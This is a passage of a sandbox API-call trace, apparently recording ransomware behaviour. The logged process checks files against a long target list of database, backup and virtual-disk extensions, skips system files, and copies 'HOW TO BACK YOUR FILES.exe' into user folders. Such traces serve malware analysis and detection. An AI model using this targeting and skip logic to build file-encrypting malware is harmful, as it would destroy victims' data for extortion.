(lpString1="op.ini", lpString2="db-wal") returned 1 [0039.928] lstrlenW (lpString="dbc") returned 3 [0039.928] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0039.928] lstrlenW (lpString="dbs") returned 3 [0039.928] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0039.928] lstrlenW (lpString="dbt") returned 3 [0039.928] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0039.928] lstrlenW (lpString="dbv") returned 3 [0039.928] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0039.928] lstrlenW (lpString="dbx") returned 3 [0039.928] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0039.928] lstrlenW (lpString="dcb") returned 3 [0039.928] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0039.928] lstrlenW (lpString="dct") returned 3 [0039.928] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0039.928] lstrlenW (lpString="dcx") returned 3 [0039.928] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0039.928] lstrlenW (lpString="ddl") returned 3 [0039.928] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0039.928] lstrlenW (lpString="dlis") returned 4 [0039.928] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0039.928] lstrlenW (lpString="dp1") returned 3 [0039.928] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0039.928] lstrlenW (lpString="dqy") returned 3 [0039.928] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0039.928] lstrlenW (lpString="dsk") returned 3 [0039.929] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0039.929] lstrlenW (lpString="dsn") returned 3 [0039.929] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0039.929] lstrlenW (lpString="dtsx") returned 4 [0039.929] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0039.929] lstrlenW (lpString="dxl") returned 3 [0039.929] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0039.929] lstrlenW (lpString="eco") returned 3 [0039.929] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0039.929] lstrlenW (lpString="ecx") returned 3 [0039.929] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0039.929] lstrlenW (lpString="edb") returned 3 [0039.929] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0039.929] lstrlenW (lpString="epim") returned 4 [0039.929] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0039.929] lstrlenW (lpString="fcd") returned 3 [0039.929] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0039.929] lstrlenW (lpString="fdb") returned 3 [0039.929] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0039.929] lstrlenW (lpString="fic") returned 3 [0039.929] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0039.929] lstrlenW (lpString="flexolibrary") returned 12 [0039.929] lstrlenW (lpString="fm5") returned 3 [0039.929] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0039.929] lstrlenW (lpString="fmp") returned 3 [0039.929] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0039.929] lstrlenW (lpString="fmp12") returned 5 [0039.929] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0039.929] lstrlenW (lpString="fmpsl") returned 5 [0039.929] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0039.929] lstrlenW (lpString="fol") returned 3 [0039.929] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0039.929] lstrlenW (lpString="fp3") returned 3 [0039.929] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0039.930] lstrlenW (lpString="fp4") returned 3 [0039.930] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0039.930] lstrlenW (lpString="fp5") returned 3 [0039.930] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0039.930] lstrlenW (lpString="fp7") returned 3 [0039.930] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0039.930] lstrlenW (lpString="fpt") returned 3 [0039.930] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0039.930] lstrlenW (lpString="frm") returned 3 [0039.930] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0039.930] lstrlenW (lpString="gdb") returned 3 [0039.930] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.930] lstrlenW (lpString="gdb") returned 3 [0039.930] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.930] lstrlenW (lpString="grdb") returned 4 [0039.930] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0039.930] lstrlenW (lpString="gwi") returned 3 [0039.930] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0039.930] lstrlenW (lpString="hdb") returned 3 [0039.930] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0039.930] lstrlenW (lpString="his") returned 3 [0039.930] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0039.930] lstrlenW (lpString="ib") returned 2 [0039.930] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0039.930] lstrlenW (lpString="idb") returned 3 [0039.930] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0039.930] lstrlenW (lpString="ihx") returned 3 [0039.930] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0039.930] lstrlenW (lpString="itdb") returned 4 [0039.930] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0039.930] lstrlenW (lpString="itw") returned 3 [0039.930] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0039.930] lstrlenW (lpString="jet") returned 3 [0039.930] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0039.931] lstrlenW (lpString="jtx") returned 3 [0039.931] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0039.931] lstrlenW (lpString="kdb") returned 3 [0039.931] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0039.931] lstrlenW (lpString="kexi") returned 4 [0039.931] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0039.931] lstrlenW (lpString="kexic") returned 5 [0039.931] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0039.931] lstrlenW (lpString="kexis") returned 5 [0039.931] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0039.931] lstrlenW (lpString="lgc") returned 3 [0039.931] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0039.931] lstrlenW (lpString="lwx") returned 3 [0039.931] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0039.931] lstrlenW (lpString="maf") returned 3 [0039.931] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0039.931] lstrlenW (lpString="maq") returned 3 [0039.931] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0039.931] lstrlenW (lpString="mar") returned 3 [0039.931] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0039.931] lstrlenW (lpString="marshal") returned 7 [0039.931] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0039.931] lstrlenW (lpString="mas") returned 3 [0039.931] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0039.931] lstrlenW (lpString="mav") returned 3 [0039.931] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0039.931] lstrlenW (lpString="maw") returned 3 [0039.931] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0039.931] lstrlenW (lpString="mdbhtml") returned 7 [0039.931] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0039.931] lstrlenW (lpString="mdn") returned 3 [0039.931] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0039.931] lstrlenW (lpString="mdt") returned 3 [0039.931] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0039.931] lstrlenW (lpString="mfd") returned 3 [0039.932] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0039.932] lstrlenW (lpString="mpd") returned 3 [0039.932] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0039.932] lstrlenW (lpString="mrg") returned 3 [0039.932] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0039.932] lstrlenW (lpString="mud") returned 3 [0039.932] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0039.932] lstrlenW (lpString="mwb") returned 3 [0039.932] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0039.932] lstrlenW (lpString="myd") returned 3 [0039.932] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0039.932] lstrlenW (lpString="ndf") returned 3 [0039.932] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0039.932] lstrlenW (lpString="nnt") returned 3 [0039.932] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0039.932] lstrlenW (lpString="nrmlib") returned 6 [0039.932] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0039.932] lstrlenW (lpString="ns2") returned 3 [0039.932] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0039.932] lstrlenW (lpString="ns3") returned 3 [0039.932] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0039.932] lstrlenW (lpString="ns4") returned 3 [0039.932] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0039.932] lstrlenW (lpString="nsf") returned 3 [0039.932] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0039.932] lstrlenW (lpString="nv") returned 2 [0039.932] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0039.932] lstrlenW (lpString="nv2") returned 3 [0039.932] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0039.932] lstrlenW (lpString="nwdb") returned 4 [0039.932] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0039.932] lstrlenW (lpString="nyf") returned 3 [0039.932] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0039.932] lstrlenW (lpString="odb") returned 3 [0039.932] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.933] lstrlenW (lpString="odb") returned 3 [0039.933] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.933] lstrlenW (lpString="oqy") returned 3 [0039.933] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0039.933] lstrlenW (lpString="ora") returned 3 [0039.933] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0039.933] lstrlenW (lpString="orx") returned 3 [0039.933] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0039.933] lstrlenW (lpString="owc") returned 3 [0039.933] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0039.933] lstrlenW (lpString="p96") returned 3 [0039.933] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0039.933] lstrlenW (lpString="p97") returned 3 [0039.933] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0039.933] lstrlenW (lpString="pan") returned 3 [0039.933] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0039.933] lstrlenW (lpString="pdb") returned 3 [0039.933] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0039.933] lstrlenW (lpString="pdm") returned 3 [0039.933] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0039.933] lstrlenW (lpString="pnz") returned 3 [0039.933] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0039.933] lstrlenW (lpString="qry") returned 3 [0039.933] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0039.933] lstrlenW (lpString="qvd") returned 3 [0039.933] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0039.933] lstrlenW (lpString="rbf") returned 3 [0039.933] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0039.933] lstrlenW (lpString="rctd") returned 4 [0039.933] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0039.933] lstrlenW (lpString="rod") returned 3 [0039.933] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0039.933] lstrlenW (lpString="rodx") returned 4 [0039.933] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0039.933] lstrlenW (lpString="rpd") returned 3 [0039.933] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0039.934] lstrlenW (lpString="rsd") returned 3 [0039.934] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0039.934] lstrlenW (lpString="sas7bdat") returned 8 [0039.934] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0039.934] lstrlenW (lpString="sbf") returned 3 [0039.934] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0039.934] lstrlenW (lpString="scx") returned 3 [0039.934] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0039.934] lstrlenW (lpString="sdb") returned 3 [0039.934] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0039.934] lstrlenW (lpString="sdc") returned 3 [0039.934] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0039.934] lstrlenW (lpString="sdf") returned 3 [0039.934] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0039.934] lstrlenW (lpString="sis") returned 3 [0039.934] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0039.934] lstrlenW (lpString="spq") returned 3 [0039.934] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0039.934] lstrlenW (lpString="te") returned 2 [0039.934] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0039.934] lstrlenW (lpString="teacher") returned 7 [0039.934] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0039.934] lstrlenW (lpString="tmd") returned 3 [0039.934] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0039.934] lstrlenW (lpString="tps") returned 3 [0039.934] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0039.934] lstrlenW (lpString="trc") returned 3 [0039.934] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.934] lstrlenW (lpString="trc") returned 3 [0039.934] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.934] lstrlenW (lpString="trm") returned 3 [0039.934] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0039.934] lstrlenW (lpString="udb") returned 3 [0039.934] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0039.934] lstrlenW (lpString="udl") returned 3 [0039.935] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0039.935] lstrlenW (lpString="usr") returned 3 [0039.935] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0039.935] lstrlenW (lpString="v12") returned 3 [0039.935] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0039.935] lstrlenW (lpString="vis") returned 3 [0039.935] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0039.935] lstrlenW (lpString="vpd") returned 3 [0039.935] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0039.935] lstrlenW (lpString="vvv") returned 3 [0039.935] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0039.935] lstrlenW (lpString="wdb") returned 3 [0039.935] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0039.935] lstrlenW (lpString="wmdb") returned 4 [0039.935] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0039.935] lstrlenW (lpString="wrk") returned 3 [0039.935] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0039.935] lstrlenW (lpString="xdb") returned 3 [0039.935] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0039.935] lstrlenW (lpString="xld") returned 3 [0039.935] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0039.935] lstrlenW (lpString="xmlff") returned 5 [0039.935] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0039.935] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4977eaa0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4977eaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0039.935] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0039.935] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 1 [0039.935] lstrcmpiW (lpString1="Sample Music", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.935] lstrcmpiW (lpString1="Sample Music", lpString2="aoldtz.exe") returned 1 [0039.935] lstrcmpiW (lpString1="Sample Music", lpString2=".") returned 1 [0039.935] lstrcmpiW (lpString1="Sample Music", lpString2="..") returned 1 [0039.935] lstrcmpiW (lpString1="Sample Music", lpString2="windows") returned -1 [0039.935] lstrcmpiW (lpString1="Sample Music", lpString2="bootmgr") returned 1 [0039.935] lstrcmpiW (lpString1="Sample Music", lpString2="temp") returned -1 [0039.935] lstrcmpiW (lpString1="Sample Music", lpString2="pagefile.sys") returned 1 [0039.936] lstrcmpiW (lpString1="Sample Music", lpString2="boot") returned 1 [0039.936] lstrcmpiW (lpString1="Sample Music", lpString2="ids.txt") returned 1 [0039.936] lstrcmpiW (lpString1="Sample Music", lpString2="ntuser.dat") returned 1 [0039.936] lstrcmpiW (lpString1="Sample Music", lpString2="perflogs") returned 1 [0039.936] lstrcmpiW (lpString1="Sample Music", lpString2="MSBuild") returned 1 [0039.936] lstrlenW (lpString="Sample Music") returned 12 [0039.936] lstrlenW (lpString="C:\\Users\\Public\\Music\\desktop.ini") returned 33 [0039.936] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="Sample Music" | out: lpString1="Sample Music") returned="Sample Music" [0039.936] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music\\Sample Music", dwFileAttributes=0x10) returned 1 [0039.936] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d22a0 [0039.936] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x46) returned 0x2ee8d0 [0039.936] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d22a8 | out: ListHead=0x2e77d0, ListEntry=0x2d22a8) returned 0x2d2288 [0039.936] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 0 [0039.936] FindClose (in: hFindFile=0x2cd0a8 | out: hFindFile=0x2cd0a8) returned 1 [0039.936] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d22a8 [0039.936] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Public\\Music\\Sample Music", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Music\\Sample Music") returned="C:\\Users\\Public\\Music\\Sample Music" [0039.936] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee8d0 | out: hHeap=0x2b0000) returned 1 [0039.936] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22a0 | out: hHeap=0x2b0000) returned 1 [0039.936] lstrlenW (lpString="C:\\Users\\Public\\Music\\Sample Music") returned 34 [0039.936] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Music\\Sample Music" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music") returned="C:\\Users\\Public\\Music\\Sample Music" [0039.936] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0039.936] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Music\\Sample Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\music\\sample music\\how to back your files.exe"), bFailIfExists=1) returned 1 [0039.943] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0039.943] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x497a4c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x497a4c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0a8 [0039.943] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.943] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0039.943] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0039.943] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x497a4c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x497a4c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.943] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.943] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0039.943] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0039.943] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0039.943] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0039.943] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.943] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0039.943] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0039.943] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0039.943] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0039.943] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0039.943] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0039.943] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0039.943] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0039.943] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0039.943] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0039.943] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0039.943] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0039.944] lstrlenW (lpString="desktop.ini") returned 11 [0039.944] lstrlenW (lpString="C:\\Users\\Public\\Music\\Sample Music\\*") returned 36 [0039.944] lstrcpyW (in: lpString1=0x2e2e8a6, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0039.944] lstrlenW (lpString="desktop.ini") returned 11 [0039.944] lstrlenW (lpString="Ares865") returned 7 [0039.944] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0039.944] lstrlenW (lpString=".dll") returned 4 [0039.944] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0039.944] lstrlenW (lpString=".lnk") returned 4 [0039.944] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0039.944] lstrlenW (lpString=".ini") returned 4 [0039.944] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0039.944] lstrlenW (lpString=".sys") returned 4 [0039.944] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0039.944] lstrlenW (lpString="desktop.ini") returned 11 [0039.944] lstrlenW (lpString="bak") returned 3 [0039.944] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0039.944] lstrlenW (lpString="ba_") returned 3 [0039.944] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0039.944] lstrlenW (lpString="dbb") returned 3 [0039.944] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0039.944] lstrlenW (lpString="vmdk") returned 4 [0039.944] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0039.944] lstrlenW (lpString="rar") returned 3 [0039.944] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0039.944] lstrlenW (lpString="zip") returned 3 [0039.944] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0039.944] lstrlenW (lpString="tgz") returned 3 [0039.944] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0039.944] lstrlenW (lpString="vbox") returned 4 [0039.944] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0039.944] lstrlenW (lpString="vdi") returned 3 [0039.944] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0039.944] lstrlenW (lpString="vhd") returned 3 [0039.944] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0039.945] lstrlenW (lpString="vhdx") returned 4 [0039.945] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0039.945] lstrlenW (lpString="avhd") returned 4 [0039.945] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0039.945] lstrlenW (lpString="db") returned 2 [0039.945] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0039.945] lstrlenW (lpString="db2") returned 3 [0039.945] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0039.945] lstrlenW (lpString="db3") returned 3 [0039.945] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0039.945] lstrlenW (lpString="dbf") returned 3 [0039.945] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0039.945] lstrlenW (lpString="mdf") returned 3 [0039.945] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0039.945] lstrlenW (lpString="mdb") returned 3 [0039.945] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0039.945] lstrlenW (lpString="sql") returned 3 [0039.945] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0039.945] lstrlenW (lpString="sqlite") returned 6 [0039.945] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0039.945] lstrlenW (lpString="sqlite3") returned 7 [0039.945] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0039.945] lstrlenW (lpString="sqlitedb") returned 8 [0039.945] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0039.945] lstrlenW (lpString="xml") returned 3 [0039.945] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0039.945] lstrlenW (lpString="$er") returned 3 [0039.945] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0039.945] lstrlenW (lpString="4dd") returned 3 [0039.945] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0039.945] lstrlenW (lpString="4dl") returned 3 [0039.945] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0039.946] lstrlenW (lpString="^^^") returned 3 [0039.946] 